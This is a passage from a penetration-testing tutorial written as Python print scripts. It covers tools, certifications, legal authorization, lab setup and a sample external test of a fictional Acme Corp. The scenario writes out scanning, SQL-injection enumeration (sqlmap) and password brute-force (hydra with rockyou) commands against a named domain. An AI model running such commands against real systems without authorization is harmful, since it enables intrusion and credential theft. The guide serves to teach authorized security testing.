├─────────────────────────────────────────────────────────────┤
│ 11 - Forensics │
│ autopsy, foremost, volatility │
├─────────────────────────────────────────────────────────────┤
│ 12 - Social Engineering │
│ setoolkit, evilginx2 │
└─────────────────────────────────────────────────────────────┘
"""
print(kali_categories)
tools = PenTestTools()
tools.display()
tools.kali_linux_tools()
7. Certifications and Career Path
Penetration Testing Certifications
class PenTestCertifications:
"""Penetration testing certifications"""
def __init__(self):
self.certifications = {
"Entry Level": {
"Certifications": [
{
"name": "CompTIA Security+",
"focus": "General security fundamentals",
"prerequisites": "None",
"exam": "SY0-601"
},
{
"name": "CEH (Certified Ethical Hacker)",
"focus": "Ethical hacking concepts",
"prerequisites": "2 years security experience or EC-Council training",
"exam": "312-50"
}
]
},
"Intermediate": {
"Certifications": [
{
"name": "GPEN (GIAC Penetration Tester)",
"focus": "Practical penetration testing",
"prerequisites": "SANS SEC560 course",
"exam": "GIAC GPEN"
},
{
"name": "OSCP (Offensive Security Certified Professional)",
"focus": "Hands-on practical testing",
"prerequisites": "Penetration Testing with Kali Linux (PWK) course",
"exam": "24-hour practical exam"
},
{
"name": "PNPT (Practical Network Penetration Tester)",
"focus": "Real-world penetration testing",
"prerequisites": "PEH course",
"exam": "5-day practical exam"
}
]
},
"Advanced": {
"Certifications": [
{
"name": "OSEP (Offensive Security Experienced Penetration Tester)",
"focus": "Advanced evasion techniques",
"prerequisites": "OSCP",
"exam": "48-hour practical exam"
},
{
"name": "OSWE (Offensive Security Web Expert)",
"focus": "Web application security",
"prerequisites": "OSCP recommended",
"exam": "48-hour practical exam"
},
{
"name": "CISSP",
"focus": "Security management",
"prerequisites": "5 years security experience",
"exam": "CISSP"
}
]
}
}
def display(self):
print("\n" + "="*55)
print("PENETRATION TESTING CERTIFICATIONS")
print("="*55)
for level, certs in self.certifications.items():
print(f"\n📜 {level.upper()}")
for cert in certs['Certifications']:
print(f"\n {cert['name']}")
print(f" Focus: {cert['focus']}")
print(f" Prerequisites: {cert['prerequisites']}")
print(f" Exam: {cert['exam']}")
def certification_path(self):
"""Recommended certification path"""
print("\n" + "="*55)
print("RECOMMENDED CERTIFICATION PATH")
print("="*55)
path = """
┌─────────────────────────────────────────────────────────────┐
│ CAREER PATH │
│ │
│ Security+ (Foundation) │
│ │ │
│ ▼ │
│ CEH / eJPT (Concepts) │
│ │ │
│ ▼ │
│ OSCP / PNPT (Practical) │
│ │ │
│ ▼ │
│ OSEP / OSWE (Advanced) │
│ │ │
│ ▼ │
│ CISSP / CREST (Management) │
│ │
└─────────────────────────────────────────────────────────────┘
Suggested Timeline:
┌─────────────────────────────────────────────────────────────┐
│ Year 1: Security+ → CEH/eJPT │
│ Year 2-3: OSCP → Practical experience │
│ Year 4: OSEP/OSWE (specialization) │
│ Year 5+: CISSP (management path) │
└─────────────────────────────────────────────────────────────┘
"""
print(path)
certs = PenTestCertifications()
certs.display()
certs.certification_path()
8. Legal and Ethical Considerations
class LegalEthical:
"""Legal and ethical aspects of penetration testing"""
def __init__(self):
self.principles = {
"Legal Authorization": {
"Requirements": [
"Signed written authorization",
"Clearly defined scope",
"Third-party consent (cloud providers, hosting)",
"Data handling agreements",
"Insurance coverage"
],
"Risks": "Testing without authorization = illegal (CFAA, Computer Misuse Act)"
},
"Professional Ethics": {
"Principles": [
"Do no harm",
"Respect confidentiality",
"Maintain integrity",
"Report findings honestly",
"Protect client data"
],
"Codes": ["EC-Council Code of Ethics", "ISC2 Code of Ethics"]
},
"Scope Limitations": {
"Restrictions": [
"Out-of-scope systems",
"Prohibited techniques",
"Testing windows",
"Data exfiltration limits",
"Denial of service restrictions"
]
},
"Data Handling": {
"Practices": [
"Encrypt sensitive findings",
"Secure transmission",
"Limited retention period",
"Secure destruction",
"Chain of custody for evidence"
]
}
}
def display(self):
print("\n" + "="*55)
print("LEGAL AND ETHICAL CONSIDERATIONS")
print("="*55)
for principle, details in self.principles.items():
print(f"\n⚖️ {principle}")
if 'Requirements' in details:
print("\nRequirements:")
for req in details['Requirements']:
print(f" • {req}")
if 'Principles' in details:
print("\nPrinciples:")
for princ in details['Principles']:
print(f" • {princ}")
if 'Risks' in details:
print(f"\nRisk: {details['Risks']}")
def authorization_letter_template(self):
"""Sample authorization letter template"""
print("\n" + "="*55)
print("AUTHORIZATION LETTER TEMPLATE")
print("="*55)
template = """
AUTHORIZATION FOR PENETRATION TESTING
======================================
Date: _____________
TO: [Testing Company]
FROM: [Client Organization]
This letter serves as formal authorization for [Testing Company] to perform
penetration testing on the systems specified below.
SCOPE OF TESTING:
-----------------
* IP Ranges: _____________
* Domains: _____________
* Applications: _____________
* Network Segments: _____________
AUTHORIZED TESTING TYPES:
------------------------
[ ] External Network Testing
[ ] Internal Network Testing
[ ] Web Application Testing
[ ] API Testing
[ ] Social Engineering
[ ] Physical Security Testing
TESTING PERIOD:
--------------
Start Date: _____________
End Date: _____________
RESTRICTIONS:
------------
* [ ] Denial of Service testing NOT authorized
* [ ] Social engineering NOT authorized
* [ ] Physical testing NOT authorized
* [ ] Production systems NOT authorized
* [ ] Data exfiltration NOT authorized
AUTHORIZED BY:
-------------
Name: _____________
Title: _____________
Signature: _____________
Date: _____________
EMERGENCY CONTACT:
-----------------
Name: _____________
Phone: _____________
Email: _____________
"""
print(template)
legal = LegalEthical()
legal.display()
legal.authorization_letter_template()
9. Building a Penetration Testing Lab
Lab Environment Setup
class PenTestLab:
"""Building a penetration testing lab"""
def __init__(self):
self.lab_components = {
"Attacker Machine": {
"OS": "Kali Linux / Parrot OS",
"Requirements": [
"8GB+ RAM",
"50GB+ storage",
"Virtualization support"
],
"Tools": "Full suite of penetration testing tools"
},
"Target Systems": {
"Vulnerable VMs": [
"Metasploitable 2/3",
"DVWA (Damn Vulnerable Web Application)",
"OWASP WebGoat",
"OWASP Juice Shop",
"VulnHub machines",
"HackTheBox machines"
],
"Purpose": "Practice exploitation techniques"
},
"Network Infrastructure": {
"Components": [
"pfSense/OPNsense firewall",
"Windows Domain Controller",
"Active Directory environment",
"Network switches (virtual)",
"IDS/IPS (Snort/Suricata)"
],
"Purpose": "Realistic network simulation"
},
"Cloud Lab": {
"Options": [
"AWS security lab",
"Azure training environment",
"GCP security playground"
],
"Tools": ["AWS CLI", "Prowler", "ScoutSuite"]
}
}
def display(self):
print("\n" + "="*55)
print("PENETRATION TESTING LAB SETUP")
print("="*55)
for component, details in self.lab_components.items():
print(f"\n💻 {component}")
if 'OS' in details:
print(f"OS: {details['OS']}")
if 'Requirements' in details:
print("Requirements:")
for req in details['Requirements']:
print(f" • {req}")
print("Components:")
for item in details.get('Vulnerable VMs', details.get('Components', details.get('Options', []))):
print(f" • {item}")
def vulnerable_machines(self):
"""List of vulnerable machines for practice"""
print("\n" + "="*55)
print("VULNERABLE MACHINES FOR PRACTICE")
print("="*55)
machines = """
BEGINNER:
• Metasploitable 2 - Purpose-built vulnerable Linux
• DVWA (Damn Vulnerable Web Application) - Web app training
• OWASP WebGoat - Web security training
INTERMEDIATE:
• VulnHub Kioptrix - Multiple levels
• VulnHub Mr-Robot - Realistic scenario
• HackTheBox - Challenge-based platform
• TryHackMe - Guided learning paths
ADVANCED:
• HackTheBox Pro Labs - Simulated enterprise environments
• Offensive Security Labs - OSCP training
• HackTheBox Offshore - Advanced AD environment
• PentesterLab Pro - Web-focused challenges
ACTIVE DIRECTORY:
• HackTheBox Forest
• HackTheBox Sauna
• VulnHub RastaLab
• Lab of the VMs (LOTV)
WEB APPLICATION:
• OWASP Juice Shop
• PortSwigger Web Security Academy
• PentesterLab Web for Pentester
• HackTheBox web challenges
"""
print(machines)
lab = PenTestLab()
lab.display()
lab.vulnerable_machines()
10. Practical Penetration Testing Scenario
End-to-End Testing Walkthrough
class PenTestScenario:
"""End-to-end penetration testing scenario"""
def __init__(self):
self.scenario = {
"Scenario": "Acme Corp External Network Penetration Test",
"Objective": "Identify vulnerabilities in external-facing assets",
"Scope": "acmecorp.com, 203.0.113.0/24",
"Rules": "No DoS, no social engineering"
}
def run_scenario(self):
"""Walk through a penetration test scenario"""
print("\n" + "="*55)
print("PENETRATION TEST SCENARIO: Acme Corp")
print("="*55)
phases = {
"Phase 1: Reconnaissance": {
"Commands": [
"whois acmecorp.com",
"nslookup -type=MX acmecorp.com",
"dig acmecorp.com ANY",
"theHarvester -d acmecorp.com -b google",
"nmap -sS -sV -p- -T4 acmecorp.com"
],
"Findings": [
"Open ports: 80 (HTTP), 443 (HTTPS), 22 (SSH)",
"Web server: Apache 2.4.41",
"SSL/TLS: TLS 1.2 with weak ciphers",
"Subdomains: mail.acmecorp.com, dev.acmecorp.com"
]
},
"Phase 2: Vulnerability Analysis": {
"Commands": [
"nikto -h https://acmecorp.com",
"nmap --script vuln acmecorp.com",
"sslscan acmecorp.com:443",
"gobuster dir -u https://acmecorp.com -w /usr/share/wordlists/dirb/common.txt"
],
"Findings": [
"Directory listing enabled on /backup",
"SSL/TLS: POODLE vulnerability",
"Apache version outdated (CVE-2020-9490)",
"Robots.txt reveals admin directory"
]
},
"Phase 3: Exploitation": {
"Activities": [
"Exploit SSL/TLS vulnerability",
"Enumerate backup directory",
"Test admin panel for default credentials",
"SQL injection on contact form"
],
"Commands": [
"sqlmap -u 'https://acmecorp.com/contact?id=1' --dbs",
"hydra -l admin -P /usr/share/wordlists/rockyou.txt acmecorp.com https-post-form"
]
},
"Phase 4: Post-Exploitation": {
"Findings": [
"Admin panel accessible with default credentials (admin:admin)",
"File upload vulnerability leads to RCE",
"Database contains customer PII",
"Internal network access possible via pivot"
]
},
"Phase 5: Reporting": {
"Critical Findings": [
"Default admin credentials - Immediate remediation",
"File upload RCE - Patch required",
"Customer data exposure - Security incident",
"Weak SSL/TLS - Configuration update"
],
"Recommendations": [
"Implement strong password policy",
"Disable directory listing",
"Update Apache to latest version",
"Implement WAF",
"Regular vulnerability scanning"
]
}
}
for phase, details in phases.items():
print(f"\n{'='*55}")
print(f"{phase}")
print("="*55)
if 'Commands' in details:
print("\nCommands Executed:")
for cmd in details['Commands']:
print(f" $ {cmd}")
if 'Findings' in details:
print("\nFindings:")
for finding in details['Findings']:
print(f" • {finding}")
if 'Activities' in details:
print("\nActivities:")
for activity in details['Activities']:
print(f" • {activity}")
if 'Critical Findings' in details:
print("\nCritical Findings:")
for finding in details['Critical Findings']:
print(f" ⚠️ {finding}")
if 'Recommendations' in details:
print("\nRecommendations:")
for rec in details['Recommendations']:
print(f" → {rec}")
scenario = PenTestScenario()
scenario.run_scenario()
Conclusion
Penetration testing is a critical component of any organization's security program. This comprehensive guide has covered:
Key Takeaways
- Methodology: Follow structured approaches (PTES, OWASP, NIST)
- Phases: Pre-engagement, Reconnaissance, Vulnerability Analysis, Exploitation, Post-Exploitation, Reporting
- Tools: Diverse toolset for different testing scenarios
- Legal: Always obtain written authorization
- Ethics: Maintain professional standards and confidentiality
- Reporting: Clear, actionable findings with remediation guidance
- Continuous Learning: Stay current with new techniques and vulnerabilities
def final_summary():
"""Final summary and recommendations"""
print("\n" + "="*55)
print("PENETRATION TESTING: KEY PRINCIPLES")
print("="*55)
principles = [
"✓ Always obtain written authorization before testing",
"✓ Define clear scope and rules of engagement",
"✓ Follow a structured methodology",
"✓ Document everything for reporting",
"✓ Prioritize findings based on risk",
"✓ Provide actionable remediation guidance",
"✓ Protect client data and maintain confidentiality",
"✓ Continuously learn and update skills",
"✓ Never stop testing assumptions",
"✓ Think like an attacker, act like a professional"
]
for principle in principles:
print(principle)
print("\n" + "="*55)
print("THE PENETRATION TESTER'S MINDSET")
print("="*55)
print("""
"The goal is not just to break things,
but to help build more secure systems.
Every vulnerability discovered is an opportunity
to improve security posture."
""")
print("="*55)
final_summary()
Penetration testing is both an art and a science. It requires technical expertise, creativity, and a deep understanding of attacker methodologies. By following established methodologies, maintaining ethical standards, and continuously improving skills, penetration testers play a vital role in strengthening organizational security.